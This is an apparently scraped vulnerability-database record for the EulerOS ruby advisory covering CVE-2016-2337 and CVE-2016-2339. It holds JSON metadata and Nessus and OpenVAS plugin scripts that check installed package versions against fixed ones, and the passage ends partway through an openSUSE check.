EulerOS 2.0 SP2 : ruby (EulerOS-SA-2017-1051)

2017-05-01T00:00:00

Description

According to the versions of the ruby packages installed, the EulerOS installation on the remote host is affected by the following vulnerabilities : - An exploitable heap overflow vulnerability exists in the Fiddle::Function.new 'initialize' function functionality of Ruby. In Fiddle::Function.new 'initialize' heap buffer 'arg_types' allocation is made based on args array length. Specially constructed object passed as element of args array can increase this array size after mentioned allocation and cause heap overflow.(CVE-2016-2339) - Type confusion exists in _cancel_eval Ruby's TclTkIp class method. Attacker passing different type of object than String as 'retval' argument can cause arbitrary code execution.(CVE-2016-2337) Note that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.

{"id": "EULEROS_SA-2017-1051.NASL", "vendorId": null, "type": "nessus", "bulletinFamily": "scanner", "title": "EulerOS 2.0 SP2 : ruby (EulerOS-SA-2017-1051)", "description": "According to the versions of the ruby packages installed, the EulerOS installation on the remote host is affected by the following vulnerabilities :\n\n - An exploitable heap overflow vulnerability exists in the Fiddle::Function.new 'initialize' function functionality of Ruby. In Fiddle::Function.new 'initialize' heap buffer 'arg_types' allocation is made based on args array length. Specially constructed object passed as element of args array can increase this array size after mentioned allocation and cause heap overflow.(CVE-2016-2339)\n\n - Type confusion exists in _cancel_eval Ruby's TclTkIp class method. Attacker passing different type of object than String as 'retval' argument can cause arbitrary code execution.(CVE-2016-2337)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "published": "2017-05-01T00:00:00", "modified": "2021-04-19T00:00:00", "epss": [], "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://www.tenable.com/plugins/nessus/99896", "reporter": "This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3900", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2339", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2337", "http://www.nessus.org/u?d7ccee39"], "cvelist": ["CVE-2015-3900", "CVE-2016-2337", "CVE-2016-2339"], "immutableFields": [], "lastseen": "2023-05-18T14:11:13", "viewCount": 13, "enchantments": {"dependencies": {"references": [{"type": "amazon", "idList": ["ALAS-2015-547", "ALAS-2015-548", "ALAS-2015-549"]}, {"type": "cve", "idList": ["CVE-2015-3900", "CVE-2015-4020", "CVE-2016-2337", "CVE-2016-2339"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1421-1:5BC60", "DEBIAN:DLA-1480-1:C4833"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2015-3900", "DEBIANCVE:CVE-2015-4020", "DEBIANCVE:CVE-2016-2337", "DEBIANCVE:CVE-2016-2339"]}, {"type": "fedora", "idList": ["FEDORA:0FC496087B07", "FEDORA:4A0D661A5EC1", "FEDORA:B90ED608757D"]}, {"type": "freebsd", "idList": ["A0089E18-FC9E-11E4-BC58-001E67150279"]}, {"type": "gentoo", "idList": ["GLSA-201710-18"]}, {"type": "github", "idList": ["GHSA-QV62-XFJ6-32XM", "GHSA-WP3J-RVFP-624H"]}, {"type": "hackerone", "idList": ["H1:103993", "H1:218088"]}, {"type": "mageia", "idList": ["MGASA-2015-0345", "MGASA-2017-0290"]}, {"type": "nessus", "idList": ["ALA_ALAS-2015-547.NASL", "ALA_ALAS-2015-548.NASL", "ALA_ALAS-2015-549.NASL", "DEBIAN_DLA-1421.NASL", "DEBIAN_DLA-1480.NASL", "EULEROS_SA-2017-1050.NASL", "EULEROS_SA-2019-1617.NASL", "FEDORA_2015-12501.NASL", "FEDORA_2015-12574.NASL", "FEDORA_2015-13157.NASL", "FREEBSD_PKG_A0089E18FC9E11E4BC58001E67150279.NASL", "GENTOO_GLSA-201710-18.NASL", "OPENSUSE-2017-435.NASL", "OPENSUSE-2017-527.NASL", "PHOTONOS_PHSA-2017-0002.NASL", "PHOTONOS_PHSA-2017-0002_RUBY.NASL", "PUPPET_ENTERPRISE_CVE_2015-4100.NASL", "SUSE_SU-2017-1067-1.NASL", "SUSE_SU-2020-1570-1.NASL", "UBUNTU_USN-3365-1.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310120440", "OPENVAS:1361412562310120441", "OPENVAS:1361412562310120442", "OPENVAS:1361412562310130042", "OPENVAS:1361412562310843256", "OPENVAS:1361412562310851531", "OPENVAS:1361412562310851543", "OPENVAS:1361412562310869851", "OPENVAS:1361412562310869888", "OPENVAS:1361412562310891421", "OPENVAS:1361412562310891480", "OPENVAS:1361412562311220171050", "OPENVAS:1361412562311220171051"]}, {"type": "osv", "idList": ["OSV:DLA-1421-1", "OSV:DLA-1480-1", "OSV:GHSA-QV62-XFJ6-32XM", "OSV:GHSA-WP3J-RVFP-624H"]}, {"type": "redhat", "idList": ["RHSA-2015:1657"]}, {"type": "redhatcve", "idList": ["RH:CVE-2016-2337", "RH:CVE-2016-2339"]}, {"type": "rubygems", "idList": ["RUBY:RUBYGEMS-UPDATE-2015-3900-122162", "RUBY:RUBYGEMS-UPDATE-2015-4020"]}, {"type": "seebug", "idList": ["SSV:96756", "SSV:96759"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2017:0933-1", "OPENSUSE-SU-2017:1128-1", "SUSE-SU-2017:0914-1", "SUSE-SU-2017:1067-1"]}, {"type": "talos", "idList": ["TALOS-2016-0031", "TALOS-2016-0034"]}, {"type": "threatpost", "idList": ["THREATPOST:47105F0F1A3DAF664EEDC82B887B86A7"]}, {"type": "ubuntu", "idList": ["USN-3365-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2015-3900", "UB:CVE-2015-4020", "UB:CVE-2016-2337", "UB:CVE-2016-2339"]}, {"type": "veracode", "idList": ["VERACODE:11752"]}]}, "score": {"value": 9.1, "vector": "NONE"}, "backreferences": {"references": [{"type": "amazon", "idList": ["ALAS-2015-549"]}, {"type": "cve", "idList": ["CVE-2015-3900"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1480-1:C4833"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2016-2339"]}, {"type": "fedora", "idList": ["FEDORA:0FC496087B07"]}, {"type": "hackerone", "idList": ["H1:218088"]}, {"type": "nessus", "idList": ["SUSE_SU-2020-1570-1.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310107358"]}, {"type": "redhatcve", "idList": ["RH:CVE-2016-2337"]}, {"type": "suse", "idList": ["SUSE-SU-2017:1067-1"]}, {"type": "talos", "idList": ["TALOS-2016-0031"]}, {"type": "threatpost", "idList": ["THREATPOST:47105F0F1A3DAF664EEDC82B887B86A7"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2015-3900", "epss": 0.00845, "percentile": 0.79764, "modified": "2023-05-06"}, {"cve": "CVE-2016-2337", "epss": 0.04839, "percentile": 0.91514, "modified": "2023-05-06"}, {"cve": "CVE-2016-2339", "epss": 0.0105, "percentile": 0.81849, "modified": "2023-05-06"}], "vulnersScore": 9.1}, "_state": {"dependencies": 1684432139, "score": 1684420907, "epss": 0}, "_internal": {"score_hash": "d3cc1d5a0fb6ff2d34c2f7330fa05141"}, "pluginID": "99896", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(99896);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/04/19\");\n\n script_cve_id(\n \"CVE-2015-3900\",\n \"CVE-2016-2337\",\n \"CVE-2016-2339\"\n );\n script_bugtraq_id(\n 75482\n );\n\n script_name(english:\"EulerOS 2.0 SP2 : ruby (EulerOS-SA-2017-1051)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the ruby packages installed, the EulerOS\ninstallation on the remote host is affected by the following\nvulnerabilities :\n\n - An exploitable heap overflow vulnerability exists in\n the Fiddle::Function.new 'initialize' function\n functionality of Ruby. In Fiddle::Function.new\n 'initialize' heap buffer 'arg_types' allocation is made\n based on args array length. Specially constructed\n object passed as element of args array can increase\n this array size after mentioned allocation and cause\n heap overflow.(CVE-2016-2339)\n\n - Type confusion exists in _cancel_eval Ruby's TclTkIp\n class method. Attacker passing different type of object\n than String as 'retval' argument can cause arbitrary\n code execution.(CVE-2016-2337)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2017-1051\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d7ccee39\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected ruby packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:ruby\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:ruby-irb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:ruby-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(2)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP2\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP2\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"ruby-2.0.0.598-25.h3\",\n \"ruby-irb-2.0.0.598-25.h3\",\n \"ruby-libs-2.0.0.598-25.h3\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"2\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ruby\");\n}\n", "naslFamily": "Huawei Local Security Checks", "cpe": ["p-cpe:/a:huawei:euleros:ruby", "p-cpe:/a:huawei:euleros:ruby-irb", "p-cpe:/a:huawei:euleros:ruby-libs", "cpe:/o:huawei:euleros:2.0"], "solution": "Update the affected ruby packages.", "nessusSeverity": "High", "cvssScoreSource": "", "vendor_cvss2": {"score": 7.5, "vector": "CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "vendor_cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "vpr": {"risk factor": "Medium", "score": "6.7"}, "exploitAvailable": false, "exploitEase": "No known exploits are available", "patchPublicationDate": "2017-03-14T00:00:00", "vulnerabilityPublicationDate": null, "exploitableWith": []}

{"openvas": [{"lastseen": "2020-01-27T18:36:51", "description": "The remote host is missing an update for the Huawei EulerOS\n ", "cvss3": {}, "published": "2020-01-23T00:00:00", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for ruby (EulerOS-SA-2017-1050)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-2337", "CVE-2015-3900", "CVE-2016-2339"], "modified": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220171050", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220171050", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2017.1050\");\n script_version(\"2020-01-23T10:46:37+0000\");\n script_cve_id(\"CVE-2015-3900\", \"CVE-2016-2337\", \"CVE-2016-2339\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 10:46:37 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 10:46:37 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for ruby (EulerOS-SA-2017-1050)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP1\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2017-1050\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2017-1050\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'ruby' package(s) announced via the EulerOS-SA-2017-1050 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"An exploitable heap overflow vulnerability exists in the Fiddle::Function.new 'initialize' function functionality of Ruby. In Fiddle::Function.new 'initialize' heap buffer 'arg_types' allocation is made based on args array length. Specially constructed object passed as element of args array can increase this array size after mentioned allocation and cause heap overflow.(CVE-2016-2339)\n\nType confusion exists in _cancel_eval Ruby's TclTkIp class method. Attacker passing different type of object than String as 'retval' argument can cause arbitrary code execution.(CVE-2016-2337)\");\n\n script_tag(name:\"affected\", value:\"'ruby' package(s) on Huawei EulerOS V2.0SP1.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP1\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby\", rpm:\"ruby~2.0.0.353~23.h4\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby-irb\", rpm:\"ruby-irb~2.0.0.353~23.h4\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby-libs\", rpm:\"ruby-libs~2.0.0.353~23.h4\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"rubygem-bigdecimal\", rpm:\"rubygem-bigdecimal~1.2.0~23.h4\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"rubygem-io-console\", rpm:\"rubygem-io-console~0.4.2~23.h4\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"rubygem-json\", rpm:\"rubygem-json~1.7.7~23.h4\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"rubygem-psych\", rpm:\"rubygem-psych~2.0.0~23.h4\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"rubygem-rdoc\", rpm:\"rubygem-rdoc~4.0.0~23.h4\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"rubygems\", rpm:\"rubygems~2.0.14~23.h4\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-27T18:38:29", "description": "The remote host is missing an update for the Huawei EulerOS\n ", "cvss3": {}, "published": "2020-01-23T00:00:00", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for ruby (EulerOS-SA-2017-1051)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-2337", "CVE-2015-3900", "CVE-2016-2339"], "modified": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220171051", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220171051", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2017.1051\");\n script_version(\"2020-01-23T10:46:39+0000\");\n script_cve_id(\"CVE-2015-3900\", \"CVE-2016-2337\", \"CVE-2016-2339\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 10:46:39 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 10:46:39 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for ruby (EulerOS-SA-2017-1051)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP2\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2017-1051\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2017-1051\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'ruby' package(s) announced via the EulerOS-SA-2017-1051 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"An exploitable heap overflow vulnerability exists in the Fiddle::Function.new 'initialize' function functionality of Ruby. In Fiddle::Function.new 'initialize' heap buffer 'arg_types' allocation is made based on args array length. Specially constructed object passed as element of args array can increase this array size after mentioned allocation and cause heap overflow.(CVE-2016-2339)\n\nType confusion exists in _cancel_eval Ruby's TclTkIp class method. Attacker passing different type of object than String as 'retval' argument can cause arbitrary code execution.(CVE-2016-2337)\");\n\n script_tag(name:\"affected\", value:\"'ruby' package(s) on Huawei EulerOS V2.0SP2.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP2\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby\", rpm:\"ruby~2.0.0.598~25.h3\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby-irb\", rpm:\"ruby-irb~2.0.0.598~25.h3\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby-libs\", rpm:\"ruby-libs~2.0.0.598~25.h3\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"rubygem-bigdecimal\", rpm:\"rubygem-bigdecimal~1.2.0~25.h3\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"rubygem-io-console\", rpm:\"rubygem-io-console~0.4.2~25.h3\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"rubygem-json\", rpm:\"rubygem-json~1.7.7~25.h3\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"rubygem-psych\", rpm:\"rubygem-psych~2.0.0~25.h3\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"rubygem-rdoc\", rpm:\"rubygem-rdoc~4.0.0~25.h3\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"rubygems\", rpm:\"rubygems~2.0.14~25.h3\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-31T18:28:17", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2017-04-29T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for ruby2.1 (openSUSE-SU-2017:1128-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-3900", "CVE-2015-1855", "CVE-2016-2339", "CVE-2015-7551", "CVE-2014-4975"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310851543", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851543", "sourceData": "# Copyright (C) 2017 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851543\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-04-29 07:16:59 +0200 (Sat, 29 Apr 2017)\");\n script_cve_id(\"CVE-2014-4975\", \"CVE-2015-1855\", \"CVE-2015-3900\", \"CVE-2015-7551\", \"CVE-2016-2339\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"openSUSE: Security Advisory for ruby2.1 (openSUSE-SU-2017:1128-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'ruby2.1'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This ruby2.1 update to version 2.1.9 fixes the following issues:\n\n Security issues fixed:\n\n - CVE-2016-2339: heap overflow vulnerability in the\n Fiddle::Function.new'initialize' (bsc#1018808)\n\n - CVE-2015-7551: Unsafe tainted string usage in Fiddle and DL (bsc#959495)\n\n - CVE-2015-3900: hostname validation does not work when fetching gems or\n making API requests (bsc#936032)\n\n - CVE-2015-1855: Ruby'a OpenSSL extension suffers a vulnerability through\n overly permissive matching of hostnames (bsc#926974)\n\n - CVE-2014-4975: off-by-one stack-based buffer overflow in the encodes()\n function (bsc#887877)\n\n Bugfixes:\n\n - SUSEconnect doesn't handle domain wildcards in no_proxy environment\n variable properly (bsc#1014863)\n\n - Segmentation fault after pack &amp ioctl &amp unpack (bsc#909695)\n\n - Ruby:HTTP Header injection in 'net/http' (bsc#986630)\n\n This update was imported from the SUSE:SLE-12:Update update project.\");\n\n script_tag(name:\"affected\", value:\"ruby2.1 on openSUSE Leap 42.2, openSUSE Leap 42.1\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2017:1128-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=(openSUSELeap42\\.2|openSUSELeap42\\.1)\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap42.2\") {\n if(!isnull(res = isrpmvuln(pkg:\"libruby2_1-2_1\", rpm:\"libruby2_1-2_1~2.1.9~8.3.2\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libruby2_1-2_1-debuginfo\", rpm:\"libruby2_1-2_1-debuginfo~2.1.9~8.3.2\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby2.1\", rpm:\"ruby2.1~2.1.9~8.3.2\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby2.1-debuginfo\", 